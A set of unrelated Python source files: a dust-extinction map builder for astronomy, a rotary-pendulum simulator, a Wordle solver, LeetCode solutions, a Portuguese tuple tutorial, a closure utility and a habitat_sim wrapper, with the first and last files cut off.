iLeft = np.argmin(np.abs(distsMed - distCompare))
iRight = np.argmin(np.abs(distsMed - distRight))
# Evaluate the straight line parameters that take L19 to Bovy
m, c = linkStraightline(distsMed[iLeft], distsMed[iRight], \
ebvL19Med[iLeft], ebvBovyMed[iRight])
# we re-initialize hybrid including the bridge
ebvHybrid = np.copy(ebvL19Med)
# ... apply the transformation along the bridge...
ebvHybrid[iLeft:iRight] = m*distsMed[iLeft:iRight] + c
# ... and everything to the right of the bridge is Bovy
ebvHybrid[iRight::] = ebvBovyMed[iRight::]
# Finally, we need to re-define the boolean "b19" so that it
# doesn't switch scaled L19 back in again.
b19 = np.isnan(ebvHybrid)
#ebvHybrid[b19] = ebvL19Med[b19]/rvFactor
bBovBad = ebvHybrid < minEBV
if dmaxL19==-1:
# Only use Lallement if Bovy is zero
# distCompare is non-zero if Bovy is zero, use only Lallement
if distCompare!=0:
ebvHybrid = ebvL19Med
if len(bBovBad)>0:
if tellTime:
print(("compareExtinctions.hybridSightline WARN - Values in the E(B-V) "
"Bovy profile are not larger than the requested minimum of %.2f at all distances." % (minEBV)))
# If distCompare is zero, Bovy is non-zero and will be the only profile used
else:
if distCompare>0:
ebvHybrid[b19] = ebvL19scaled[b19]
# ebvHybrid[bBovBad] = ebvL19Med[bBovBad]/rvFactor
ebvHybrid[bBovBad] = ebvL19scaled[bBovBad]
# If the user's choices have led to a profile that is zero at all
# distances, warn the user (unless the user has suppressed text
# output)
if np.all(ebvHybrid==0):
if tellTime:
print("compareExtinctions.hybridSightline WARN - The E(B-V) profile is zero at all distances!")
if tellTime:
t2 = time.time()
dtBovy = t1 - t0
dtSample = t2 - t1
dtTotal = t2 - t0
print("TIMING: setup:%.2e s, querying:%.2e s, total:%.2e s" \
% (dtBovy, dtSample, dtTotal))
# if not plotting, return
if not doPlots:
if returnValues:
return ebvHybrid, distsMed, rvFactor, distCompare
else:
return
## Now we compute the upper and lower levels for plotting. I am
## not certain if it's better to use percentiles or to use the
## standard deviation (there is a tradeoff when there are few
## samples) so both are computed for the moment.
ebvL19Std = np.std(stackL19, axis=0)
ebvL19Levs = np.percentile(stackL19, [pctLower, pctUpper],\
axis=0)
ebvBovyStd = np.std(stackBovy, axis=0)
ebvBovyLevs = np.percentile(stackBovy, [pctLower, pctUpper],\
axis=0)
# same for planck2d
ebvPlanck2DStd = np.std(stackPlanck2D)
ebvPlanck2DLevs = np.percentile(stackPlanck2D, [pctLower, pctUpper])
### Now we plot the regions of coverage to the percentile limits,
### for the bovy and for the L+19 predictions.
dumLevsL19 = ax1.fill_between(distsMed, ebvL19Levs[0], ebvL19Levs[1], \
zorder=9, alpha=0.4, color='0.5')
dumLevsBovy = ax1.fill_between(distsMed, ebvBovyLevs[0], ebvBovyLevs[1], \
zorder=9, alpha=0.3, color='r')
### Show the median levels for Bovy and for L+19
dumMedsL19 = ax1.plot(distsMed, ebvL19Med, color='k', ls='-.', \
zorder=20, lw=2, \
label=r'L19, R$_V$=%.2f' % (Rv))
dumMedsBovy = ax1.plot(distsMed, ebvBovyMed, color='r', ls='--', \
zorder=21, lw=2, label='Bovy median')
# if we have it, show the levels for planck
dumPlanckMed = ax1.axhline(planck2DMed, color='g', ls='-', lw=2, \
label='Planck 2D', alpha=0.7)
# Overplot the hybrid EBV curve
dumHybrid = ax1.plot(distsMed, ebvHybrid, ls='-', color='c', lw=6, \
label='Hybrid E(B-V)', zorder=31, alpha=0.5)
# show lallement et al. scaled up to bovy et al. at the transition
# -- IF we wanted to do the scaling...
coloScaled='b'
if not bridgeL19:
dumScal = ax1.plot(distsMed[b19], ebvL19scaled[b19], \
color=coloScaled, \
lw=2, \
ls=':', \
label=r'L19, R$_{V}$=%.2f' % (RvScaled), \
zorder=35, alpha=0.75)
dumLevsScal = ax1.fill_between(distsMed[b19], \
ebvL19Levs[0][b19]/rvFactor, \
ebvL19Levs[1][b19]/rvFactor, \
color=coloScaled, \
alpha=0.2, \
zorder=34)
#sAnno = "Green dashed: L19 w/ Rv=%.2f" % (RvScaled)
#dum = ax1.annotate(sAnno, (0.95,0.05), xycoords='axes fraction', \
# ha='right', va='bottom', color='g')
# override the axis title:
sTitle = '(lCen, bCen)=(%.2f, %.2f), NSIDE=%i. %i samples' % \
(lCen, bCen, nside, 1+len(vL))
# add the levels information
sTitle = '%s. Pct lower, upper = %.1f, %.1f' % (sTitle, pctLower, pctUpper)
ax1.set_title(sTitle)
# ok NOW we do the legend.
leg = ax1.legend(loc=0, frameon=True, facecolor='w', framealpha=1.)
# Now show these over the figure
#dumAvgL19 = ax1.errorbar(distsMed, ebvL19Med, \
# yerr=ebvL19Std, \
# ls=None, ms=5,
# zorder=20)
#dumAvgL19 = ax1.errorbar(distsMed, ebvBovyMed, \
# yerr=ebvBovyStd, \
# ls=None, ms=5,
# zorder=20)
# Show a panel giving the sight lines looked at here. We will want
# the maximum bovy extinctions for each (since that goes farther):
maxBovy = stackBovy[1::,-1] # for our colors, not including central
maxPlanck2D = stackPlanck2D[1::]
# debug - what sight lines are we looking at here?
#fig2 = plt.figure(2, figsize=(3,3))
#fig2.clf()
#ax2 = fig1.add_subplot(224)
# If we have planck2d as well as bovy, show both. Otherwise don't
# show both.
lAx = [fig1.add_subplot(gs[1,2])]
lCo = [maxBovy]
lLa = ['E(B-V), Bovy']
lGood = [np.isfinite(maxBovy)]
vmin = None
vmax = None
if np.max(stackPlanck2D) > 1e-3:
lAx.append(fig1.add_subplot(gs[0,2]))
lCo.append(maxPlanck2D)
lLa.append('E(B-V), Planck')
bPla = maxPlanck2D < planckUpperLim
lGood.append(bPla) # was set many lines above.
ebvBoth = np.hstack(( maxBovy, maxPlanck2D[bPla] ))
vmin = np.min(ebvBoth)
vmax = np.max(ebvBoth)
for iAx in range(len(lAx)):
ax2 = lAx[iAx]
vColor = lCo[iAx]
labl = lLa[iAx]
bb = lGood[iAx]
#ax2 = fig1.add_subplot(gs[1,2])
dumCen = ax2.plot(lCen, bCen, 'm*', ms=20, zorder=1)
dumSamp = ax2.scatter(vL[bb], vB[bb], c=vColor[bb], \
zorder=5, cmap='Greys', \
edgecolor='0.5', marker='s', s=49, \
vmin=vmin, vmax=vmax)
# show sightlines that failed
if np.sum(~bb) > 0:
blah = ax2.scatter(vL[~bb], vB[~bb], c='r', \
zorder=1, alpha=0.25, \
marker='x', s=36)
cbar = fig1.colorbar(dumSamp, ax=ax2, label=labl)
ax2.set_xlabel('l, degrees')
ax2.set_ylabel('b, degrees')
ax2.grid(which='both', zorder=1, color='0.5', alpha=0.5)
ax2.set_title('Samples about %.2f, %.2f' % (lCen, bCen), \
fontsize=9)
# fig2.subplots_adjust(left=0.25, bottom=0.25)
# save the figure to disk
if len(figName) > 3:
fig1.savefig(figName, overwrite=True)
if returnValues:
return ebvHybrid, distsMed, rvFactor, distCompare
def linkStraightline(xLeft=0., xRight=0., yLeft=0., yRight=0.):
"""Given (x,y) points for the left- and right-ends of a straight line,
return the coefficients of the straight line m, c from y = mx + c.
"""
if np.abs(xRight - xLeft) < 1.0e-3:
return 1., 0.
m = (yRight - yLeft) / (xRight - xLeft)
c = yLeft - m*xLeft
return m, c
def loopSightlines(nside=64, imin=0, imax=25, \
nbins=500, nested=False, \
nl=4, nb=4, tellTime=False, \
reportInterval=100, \
fitsPath='', \
dirChunks='./ebvChunksRedo', \
fracPix=1., \
map_version='19', \
Rv=3.1, \
dmaxL19=1e6, \
bridgeL19=False, \
bridgeWidthL19 = 1000):
"""Wrapper: samples the 3D extinction hybrid model for a range of
healpixels
nside = healpix nside
imin, imax = first and last hpids to use
nbins = number of distance bins to use for each sightline
nl, nb = number of samples to use around each sight line
reportInterval = write do disk (and/or provide screen output)
every this many healpix
fitsPath = if >3 characters, the path to output fits file that
overrides auto-generated output path
dirChunks = if auto-generating the output path, the directory into
which the file will go. Ignored if fewer than 4 characters.
map_version = version of the L+19 map to send to the sightlines
Rv = Rv needed for the L+19 map object
---
Example call:
To loop through NSIDE=64 healpix IDs 999-1019:
compareExtinctions.loopSightlines(64, 999, 1019, reportInterval=10, nl=4, nb=4, fracPix=0.8, nbins=500)
"""
# set up the healpix quantities
npix = hp.nside2npix(nside)
print("loopSightlines INFO: nside %i, npix %i, %.3e" \
% (nside, npix, npix))
# How far through this are we going to go?
if imax < 0 or imax > npix:
imax = npix
# set imin appropriately
if imin > imax:
imin = np.max([imax - 25, 0])
print("loopSightlines WARN - supplied imax > imin. Defaulted to %i, %i" % (imin, imax))
# Number of sightlines
nSightlines = imax - imin
# let's construct a filename for this segment so we can keep track
# of them later.
if len(fitsPath) < 4:
fitsChunk = 'ebv3d_nside%i_hp%i_%i.fits' % (nside, imin, imax)
if len(dirChunks) > 3:
fitsPath = '%s/%s' % (dirChunks, fitsChunk)
if not os.access(dirChunks, os.R_OK):
dirChunks = os.makedirs(dirChunks)
else:
fitsPath = fitsChunk[:]
# set up distance and E(B-V) arrays for only the ones we will be
# running. We also store the healpix IDs so that we could do this
# in pieces and then stitch them together later.
shp = (nSightlines, nbins)
# set up the arrays we'll be using
hpids = np.arange(imin, imax)
dists = np.zeros(shp)
ebvs = np.zeros(shp)
# Let's keep track of the scale factor we used to merge L19 with
# Bovy et al, as well as the distance at which the scaling was
# done:
sfacs = np.ones((nSightlines,2))
# Set up header information for the inevitable serialization. I
# think astropy has a nice way to do this, for the moment we can
# build one with a dictionary.
dMeta = {'nside':nside, 'nested':nested, \
'hpmin':imin, 'hpmax':imax, \
'nbins':nbins, 'nl':nl, 'nb':nb, \
'fracPix':fracPix}
dMeta['Rv'] = Rv
dMeta['mapvers'] = map_version
# 2021-04-05: if planck_2d is available on this system, add this
# to the header (we do not yet have any option to deactivate the
# substitution if present).
dMeta['PlanckOK'] = PLANCK_2D is not None
# 2021-04-07: Now that we have options for how we handle L19 and
# Bovy merging, pass the choices to the metadata so that it
# appears in the fits header.
dMeta['dmaxL19'] = dmaxL19
dMeta['bridgL19'] = bridgeL19
dMeta['bridgwid'] = bridgeWidthL19
# For reporting the sightlines to terminal
tStart = time.time()
# OK now loop through this. We don't want to have to redo the bovy
# initialization for each sight line, so let's initialize it here.
print ("loopSightlines - initializing Bovy...")
combined19 = mwdust.Combined19()
# We also initialize the Lallement+19 map object
print("loopSightlines - initializing L19...")
l19 = stilism_local.LallementDustMap(version=map_version,Rv=Rv)
print("loopSightlines - starting loops:")
for iHP in range(np.size(hpids)):
ebvsThis, distsThis, \
rvFactor, distCompare \
= hybridSightline(0., 0., \
nl=nl, nb=nb, \
setLimDynamically=False, \
useTwoBinnings=True, \
nBinsAllSightlines=nbins, \
Rv=Rv, \
pixFillFac=fracPix, \
nested=nested, \
nside=nside, \
objBovy=combined19, \
objL19=l19, \
doPlots=False, \
tellTime=tellTime, \
dmaxL19=dmaxL19, \
bridgeL19=bridgeL19, \
bridgeWidthL19=bridgeWidthL19, \
returnValues=True, \
hpid=hpids[iHP])
# now put the results into the master arrays by row number
# (which is why we loop through the length of the hp array and
# not the hpids themselves):
dists[iHP] = distsThis
ebvs[iHP] = ebvsThis
sfacs[iHP][0] = rvFactor
sfacs[iHP][1] = distCompare
# Write to disk every so often
if iHP >= reportInterval and iHP % reportInterval < 1:
writeExtmap(hpids, dists, ebvs, sfacs, \
dMeta=dMeta, \
fitsPath=fitsPath)
print("loopSightlines INFO: %i of %i: hpid %i: %.2e s" \
% (iHP, nSightlines, hpids[iHP], time.time()-tStart))
# use our method to write to disk
writeExtmap(hpids, dists, ebvs, sfacs, \
dMeta=dMeta, \
fitsPath=fitsPath)
def writeExtmap(hpids=np.array([]), dists=np.array([]), \
ebvs=np.array([]), sfacs=np.array([]), \
masks=np.array([]), \
dMeta={}, header=None, fitsPath='test.fits'):
"""Writes extinction map segment to fits. HDUs are, in this order:
hpids, distance bins, E(B-V)s, scale factors = data arrays to write
masks = optional boolean mask array
dMeta = dictionary of metadata keywords to pass
header = template header to send to the primary HDU
fitsPath = filename for output file"""
if np.size(hpids) < 1:
return
# Generate primary header, accepting template header if given
hdu0 = fits.PrimaryHDU(hpids, header=header)
for sKey in dMeta.keys():
hdu0.header[sKey] = dMeta[sKey]
# ... then the secondary arrays, which we will serialize as image hdus:
hdul = fits.HDUList([hdu0])
# now we append them
for thisArr in [dists, ebvs, sfacs, masks]:
hdul.append(fits.ImageHDU(thisArr))
hdul.writeto(fitsPath, overwrite=True)
# close the hdulist
hdul.close()
def mergeMaps(sSrch='ebv3d_nside64_*fits', \
pathJoined='merged_ebv3d_nside64.fits'):
"""Given partial healpix maps, merge them into a single all-sky hp
map. A list of paths matching the search string is constructed, and
the all-sky map constructed by slotting in the populated rows from the
individual files.
"""
lPaths = glob.glob(sSrch)
if len(lPaths) < 1:
print("mergeMaps WARN - no paths match string %s" % (sSrch))
return
# ensure the output file doesn't overwrite any of the input files
if len(pathJoined) < 4:
pathJoined = 'test_mergedmaps.fits'
# if the joined path is in the path of files, remove it from the
# list to consider and prepend "tmp_" to the output path. This
# should guard against any overwriting of input files.
if pathJoined in lPaths:
print("mergeMaps INFO - output path %s already in input path list. Removing from input path list and using a different output path." % (pathJoined))
lPaths.remove(pathJoined)
pathJoined = 'tmp_%s' % (os.path.split(pathJoined)[-1])
# read the healpix info from the header of the first file in the
# list. For the moment we trust the header rather than
# constructing this information from the input data.
hdr0 = fits.getheader(lPaths[0])
try:
nested = hdr0['NESTED']
nside = hdr0['NSIDE']
nbins = hdr0['NBINS']
except:
print("mergeMaps WARN - problem reading header keywords from %s" \
% (lPaths[0]))
return
# Now we construct our master arrays.
npix = hp.nside2npix(nside)
# hpid, distance, ebvs, and a mask array. The mask array follows
# np.masked convention that the mask is FALSE for GOOD points.
hpidsMaster = np.arange(npix)
distsMaster = np.zeros((npix, nbins))
ebvsMaster = np.zeros((npix, nbins))
sfacsMaster = np.zeros((npix, 2))
maskMaster = np.ones((npix, nbins), dtype='uint')
# OK now we slot in the various pieces
for path in lPaths:
hdul = fits.open(path)
rowsThis = hdul[0].data
distsMaster[rowsThis] = hdul[1].data
ebvsMaster[rowsThis] = hdul[2].data
sfacsMaster[rowsThis] = hdul[3].data
# This is a little clunky, since we're allowing for the
# possibility that the input data might or might not have mask
# data written, and that mask data may or may not be zero
# sized.
hasMask = False
if len(hdul) > 4:
if np.size(hdul[4].data) > 0:
maskMaster[rowsThis] = hdul[4].data
hasMask = True
if not hasMask:
maskMaster[rowsThis, :] = 0
# Close the hdulist before moving on
hdul.close()
# now we have our combined arrays and template header. Write them!
# (2021-04-07 now not with the mask, since I don't think I know
# how it will be used...)
writeExtmap(hpidsMaster, distsMaster, ebvsMaster, sfacsMaster, \
header=hdr0, \
fitsPath=pathJoined)
|
#
# @lc app=leetcode.cn id=529 lang=python3
#
# [529] minesweeper
#
None
# @lc code=end
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import numpy as np
import math
# Motor
Rm = 8.4 # Resistance
kt = 0.042 # Current-torque (N-m/A)
km = 0.042 # Back-emf constant (V-s/rad)
# Rotary Arm
mr = 0.095 # Mass (kg)
Lr = 0.085 # Total length (m)
Jr = mr * Lr**2 / 12 # Moment of inertia about pivot (kg-m^2)
Dr = 0.0015 # Equivalent viscous damping coefficient (N-m-s/rad)
# Pendulum Link
mp = 0.024 # Mass (kg)
Lp = 0.129 # Total length (m)
Jp = mp * Lp**2 / 12 # Moment of inertia about pivot (kg-m^2)
Dp = 0.0005 # Equivalent viscous damping coefficient (N-m-s/rad)
g = 9.81 # Gravity constant
# Encoders
enc_discretization = 2048 # Encoder resolution
def forward_model(theta, alpha, theta_dot, alpha_dot, Vm, dt, euler_steps):
dt /= euler_steps
for step in range(euler_steps):
tau = (km * (Vm - km * theta_dot)) / Rm # torque
theta_dot_dot = -(
Lp * Lr * mp *
(8.0 * Dp * alpha_dot - Lp**2 * mp * theta_dot**2 * math.sin(
2.0 * alpha) + 4.0 * Lp * g * mp * math.sin(alpha)) *
math.cos(alpha) + (4.0 * Jp + Lp**2 * mp) *
(4.0 * Dr * theta_dot +
Lp**2 * alpha_dot * mp * theta_dot * math.sin(2.0 * alpha) +
2.0 * Lp * Lr * alpha_dot**2 * mp * math.sin(alpha) - 4.0 * tau)) / (
4.0 * Lp**2 * Lr**2 * mp**2 * math.cos(alpha)**2 +
(4.0 * Jp + Lp**2 * mp) *
(4.0 * Jr + Lp**2 * mp * math.sin(alpha)**2 + 4.0 * Lr**2 * mp))
alpha_dot_dot = (
4.0 * Lp * Lr * mp *
(2.0 * Dr * theta_dot + 0.5 * Lp**2 * alpha_dot * mp * theta_dot *
math.sin(2.0 * alpha) + Lp * Lr * alpha_dot**2 * mp * math.sin(alpha)
- 2.0 * tau) * math.cos(alpha) -
(4.0 * Jr + Lp**2 * mp * math.sin(alpha)**2 + 4.0 * Lr**2 * mp) *
(4.0 * Dp * alpha_dot - 0.5 * Lp**2 * mp * theta_dot**2 *
math.sin(2.0 * alpha) + 2.0 * Lp * g * mp * math.sin(alpha))) / (
4.0 * Lp**2 * Lr**2 * mp**2 * math.cos(alpha)**2 +
(4.0 * Jp + Lp**2 * mp) *
(4.0 * Jr + Lp**2 * mp * math.sin(alpha)**2 + 4.0 * Lr**2 * mp))
theta_dot += theta_dot_dot * dt
alpha_dot += alpha_dot_dot * dt
theta += theta_dot * dt
alpha += alpha_dot * dt
theta %= (2 * math.pi)
alpha %= (2 * math.pi)
return theta, alpha, theta_dot, alpha_dot
# Use numba if installed
try:
import numba
forward_model = numba.jit(forward_model)
except:
print('Warning: Install \'numba\' for faster simulation.')
class QubeServo2Simulator(object):
'''Simulator that has the same interface as the hardware wrapper.'''
def __init__(self,
safe_operating_voltage=8.0,
euler_steps=1,
frequency=1000):
self._time_step = 1.0 / frequency
self._euler_steps = euler_steps
self.state = [0, 0, 0, 0]
self.encoders = [0, 0]
self.unnormalized_angles = [self.state[0], self.state[1]]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
def reset_encoders(self):
pass
def action(self, action):
self.state = forward_model(
*self.state,
action,
self._time_step,
self._euler_steps)
self.unnormalized_angles[0] += self.state[2] * self._time_step
self.unnormalized_angles[1] += self.state[3] * self._time_step
self.encoders[0] = int(self.unnormalized_angles[0] * (-enc_discretization / (2.0 * np.pi)))
self.encoders[1] = int(self.unnormalized_angles[1] * (enc_discretization / (2.0 * np.pi)))
currents = [action / 8.4] # 8.4 is resistance
others = [0.] #[tach0, other_stuff]
return currents, self.encoders, others
|
import queue
import copy
from english_words import english_words_set
ENGLISH_CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
dictionary_search = True
guesses = [
"PANTS",
"FJORD",
"CHEWY"
]
scores = [
"BBGGB",
"BBYBB",
"BYBBB"
]
def input_validation(guesses, scores):
if len(guesses) != len(scores):
raise ValueError(f"the tries and scores need to have the same length. Got tries: {len(guesses)} and scores: {len(scores)}")
for guess, score in zip(guesses, scores):
if len(guess) != 5:
raise ValueError(f"the length of guess needs to be 5. {guess} is not length of 5")
if len(score) != 5:
raise ValueError(f"the length of guess needs to be 5. {score} is not length of 5")
def convert_to_loc_limitation(guesses,scores):
options = [set(ENGLISH_CHARS) for i in range(5)]
# all letters that need to be used but we don't know the location of
need_to_use = set()
for guess, score in zip(guesses, scores):
for char, sc, ind in zip(guess, score, range(5)):
if sc == "G":
if char not in options[ind]:
raise RuntimeError("There is contradiction somewhere.")
options[ind] = set(char)
# there are edge cases where multiple of the same characters exist in a word
need_to_use.discard(char)
if sc == "Y":
options[ind].discard(char)
need_to_use.add(char)
if sc == "B":
if char in need_to_use:
raise RuntimeError("There is a contradiction")
for op in options:
op.discard(char)
return options, need_to_use
def get_known_chars(known_non_locs):
return None
input_validation(guesses, scores)
options, need_to_use = convert_to_loc_limitation(guesses, scores)
que = queue.Queue()
for char in options[0]:
next_need_to_use = copy.copy(need_to_use)
next_need_to_use.discard(char)
que.put([char, copy.copy(next_need_to_use)])
while not que.empty():
word, need_to_use = que.get()
if len(word) == 5:
if dictionary_search:
if word.lower() in english_words_set:
print(word)
else:
print(word)
else:
option = options[len(word)]
for next_char in option:
if next_char in need_to_use:
next_need_to_use = copy.copy(need_to_use)
next_need_to_use.remove(next_char)
que.put([word+next_char, next_need_to_use])
else:
if len(need_to_use) + len(word) < 5:
que.put([word+next_char, copy.copy(need_to_use)])
print("DONE")
|
#!/usr/bin/python3
"""
We are given an array asteroids of integers representing asteroids in a row.
For each asteroid, the absolute value represents its size, and the sign
represents its direction (positive meaning right, negative meaning left). Each
asteroid moves at the same speed.
Find out the state of the asteroids after all collisions. If two asteroids meet,
the smaller one will explode. If both are the same size, both will explode. Two
asteroids moving in the same direction will never meet.
Example 1:
Input:
asteroids = [5, 10, -5]
Output: [5, 10]
Explanation:
The 10 and -5 collide resulting in 10. The 5 and 10 never collide.
Example 2:
Input:
asteroids = [8, -8]
Output: []
Explanation:
The 8 and -8 collide exploding each other.
Example 3:
Input:
asteroids = [10, 2, -5]
Output: [10]
Explanation:
The 2 and -5 collide resulting in -5. The 10 and -5 collide resulting in 10.
Example 4:
Input:
asteroids = [-2, -1, 1, 2]
Output: [-2, -1, 1, 2]
Explanation:
The -2 and -1 are moving left, while the 1 and 2 are moving right.
Asteroids moving the same direction never meet, so no asteroids will meet each
other.
Note:
The length of asteroids will be at most 10000.
Each asteroid will be a non-zero integer in the range [-1000, 1000]..
"""
from typing import List
class Solution:
def asteroidCollision(self, asteroids: List[int]) -> List[int]:
"""
simplified
while-else: break statement break the entire while-else block
for-else: break statement break the entire for-else block
stack from left to right, only -> <- will pop the stack
"""
stk = []
for e in asteroids:
while stk and e < 0 < stk[-1]:
if abs(e) > abs(stk[-1]):
# -> exploded, <- continues
stk.pop()
elif abs(e) == abs(stk[-1]):
# -> <- both exploded
stk.pop()
break
else:
# <- exploded, -> continue
break
else:
stk.append(e)
return stk
def asteroidCollision_complex(self, asteroids: List[int]) -> List[int]:
"""
asteroids same speed
list of size
stk of index
only -> <- will collide
"""
stk = []
n = len(asteroids)
for i in range(n-1, -1, -1):
cur = asteroids[i]
while stk and asteroids[stk[-1]] < 0 and cur > 0 and abs(asteroids[stk[-1]]) < abs(cur):
stk.pop()
if stk and cur > 0 and asteroids[stk[-1]] == -cur:
stk.pop()
continue
if not stk:
stk.append(i)
continue
if not (asteroids[stk[-1]] < 0 and cur > 0) or abs(cur) > abs(asteroids[stk[-1]]):
stk.append(i)
return [
asteroids[i]
for i in stk[::-1]
]
if __name__ == "__main__":
assert Solution().asteroidCollision([10, 2, -5]) == [10]
assert Solution().asteroidCollision([5, 10, -5]) == [5, 10]
assert Solution().asteroidCollision([8, -8]) == []
|
lanche = ('Hamburguer', 'Suco', 'Pizza', 'Pudim')
#print(lanche[1:3]) # só irá imprimir Suco e Pizza
#lanche = ('Hamburguer', 'Suco', 'Pizza', 'Pudim')
#for comida in lanche:
# print(f'Eu vou comer {comida}')
#print('-'*30)
#
#for cont in range (0, len(lanche)):
# print(f'Eu vou comer {lanche[cont]} na posicao {cont}')
#print('-'*30)
#
#for pos, comida in enumerate (lanche):
# print(f'Eu vou comer {comida} na posicao {pos}')
#print('-'*30)
#print('Comi pra caramba!!!!')
#lanche = ('Hamburguer', 'Suco', 'Pizza', 'Pudim')
#print(sorted(lanche)) # Para imprimir em ordem
#a = (2, 5, 4)
#b = (5, 8, 1, 2)
#c = a + b # Concatenar as TUPLAS
#print(c)
#
#a = (2, 5, 4)
#b = (5, 8, 1, 2)
#c = a + b # Concatenar as TUPLAS
#print(len(c))
#
#a = (2, 5, 4)
#b = (5, 8, 1, 2)
#c = a + b # Concatenar as TUPLAS
#print(c.count(5)) #contar quantos numeros 5 tem nas TUPLAS
#
#a = (2, 5, 4)
#b = (5, 8, 1, 2)
#c = a + b # Concatenar as TUPLAS
#print(c)
#print(c.index(8)) #em que posicao está o numero 8
#
#a = (2, 5, 4)
#b = (5, 8, 1, 2)
#c = a + b # Concatenar as TUPLAS
#print(c)
#print(c.index(2)) #em que posicao está o numero 2, como existem 2 x o numero 2, ele pega a primeira ocorrencia
#pessoa = ('Gustavo', 39, 'M', 99.88) #pode ter tipos diferentes dentro de uma TUPLA
#print(pessoa)
pessoa = ('Gustavo', 39, 'M', 99.88) #pode ter tipos diferentes dentro de uma TUPLA
del (pessoa) # apagar a TUPLA
print(pessoa)
|
# coding: utf8
# The MIT License (MIT)
#
# Copyright (c) 2018 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module contains tools for modifying function objects and anything else
related to the Python function type like artificial function closure creation.
"""
__all__ = ['new_closure_cell', 'new_closure', 'replace_closure']
import collections
import functools
import types
def new_closure_cell(x):
"""
Creates a new Python cell object that can usually be found in a functions
`__closure__` tuple. The values in a `__closure__` must match the free
variables defined in the function's code object's `co_freevars` member.
x (any): The cell contents.
return (cell): A function closure cell object containing *x*.
"""
return (lambda: x).__closure__[0]
def new_closure(cell_values):
"""
Creates a function closure from the specified list/iterable of value. The
returned object is a tuple of cell objects created with #new_closure_cell().
cell_values (iterable): An iterable of cell values.
return (tuple of cell): A tuple containing only cell objects.
"""
return tuple(map(new_closure_cell, cell_values))
def replace(function, code=None, globals=None, name=None,
argdefs=None, closure=None):
"""
Creates a new function object from the reference *function* where its
members can be replaced using the specified arguments.
# Closure
If *closure* is a dictionary, only the free variables expected by the
function are read from it. If a variable is not defined in the dictionary,
its value will not be changed.
If *closure* is a list/iterable instead it must have exactly as many
elements as free variables required by the function's code object. If
this condition is not satisfied, a #ValueError is raised.
function (types.FunctionType): A function object.
code (code): The functions new code object.
globals (dict):
"""
if not isinstance(function, types.FunctionType):
raise TypeError('expected FunctionType, got {}'.format(
type(function).__name__))
if code is None:
code = function.__code__
if globals is None:
globals = function.__globals__
if name is None:
name = function.__name__
if argdefs is None:
argdefs = function.__defaults__
if closure is None:
closure = function.__closure__
else:
if isinstance(closure, collections.Mapping):
closure = [
closure.get(x, function.__closure__[i].cell_contents)
for i, x in enumerate(function.__code__.co_freevars)]
closure = new_closure(closure)
if len(closure) != len(function.__code__.co_freevars):
raise ValueError('function requires {} free closure, only '
'{} values are specified'.format(
len(function.__code__.co_freevars),
len(closure)))
new_func = types.FunctionType(code, globals, name, argdefs, closure)
functools.update_wrapper(new_func, function)
return new_func
|
import habitat_sim
from Config import Config
class Simulator:
def __init__(self):
test_scene = Config().scene
sim_settings = {
"width": 640, # Spatial resolution of the observations
"height": 480,
"scene": test_scene, # Scene path
"default_agent": 0,
"sensor_height": 1.5, # Height of sensors in meters
"color_sensor": True, # RGB sensor
"semantic_sensor": True, # Semantic sensor
"depth_sensor": True, # Depth sensor
"seed": 1,
}
cfg = self.make_cfg(sim_settings)
self.sim = habitat_sim.Simulator(cfg)
self.action_names = list(
cfg.agents[
sim_settings["default_agent"]
].action_space.keys()
)
self.total_frames = 0
def make_cfg(self, settings):
sim_cfg = habitat_sim.SimulatorConfiguration()
sim_cfg.gpu_device_id = 0
sim_cfg.scene.id = settings["scene"]
# Note: all sensors must have the same resolution
sensors = {
"color_sensor": {
"sensor_type": habitat_sim.SensorType.COLOR,
"resolution": [settings["height"], settings["width"]],
"position": [0.0, settings["sensor_height"], 0.0],
},
"depth_sensor": {
"sensor_type": habitat_sim.SensorType.DEPTH,
"resolution": [settings["height"], settings["width"]],
"position": [0.0, settings["sensor_height"], 0.0],
},
"semantic_sensor": {
"sensor_type": habitat_sim.SensorType.SEMANTIC,
"resolution": [settings["height"], settings["width"]],
"position": [0.0, settings["sensor_height"], 0.0],
},
}
sensor_specs = []
for sensor_uuid, sensor_params in sensors.items():
if settings[sensor_uuid]:
sensor_spec = habitat_sim.SensorSpec()
sensor_spec.uuid = sensor_uuid
sensor_spec.sensor_type = sensor_params["sensor_type"]
sensor_spec.resolution = sensor_params["resolution"]
sensor_spec.position = sensor_params["position"]
sensor_specs.append(sensor_spec)
# Here you can specify the amount of displacement in a forward action and the turn angle
agent_cfg = habitat_sim.agent.AgentConfiguration()
agent_cfg.sensor_specifications = sensor_specs
agent_cfg.action_space = {
"move_forward": habitat_sim.agent.ActionSpec(
"move_forward", habitat_sim.agent.ActuationSpec(amount=0.5)
),
"move_backward": habitat_sim.agent.ActionSpec(
"move_backward", habitat_sim.agent.ActuationSpec(amount=0.5)
),
"turn_left": habitat_sim.agent.ActionSpec(
"turn_left", habitat_sim.agent.ActuationSpec(amount=10.0)
),
"turn_right": habitat_sim.agent.ActionSpec(
"turn_right", habitat_sim.agent.ActuationSpec(amount=10.0)
),
}
return habitat_sim.Configuration(sim_cfg, [agent_cfg])
def get_obs(self, action):
observations = self.sim.step(action)
rgb = observations["color_sensor"]
# semantic = observations["semantic_sensor"]
depth = observations["depth_sensor"]
self.total_frames += 1
return rgb, depth
def reset(self):
agent = self.sim.get_agent(0)
agent_state = agent.initial_state # agent.get_state()
num_start_tries = 0
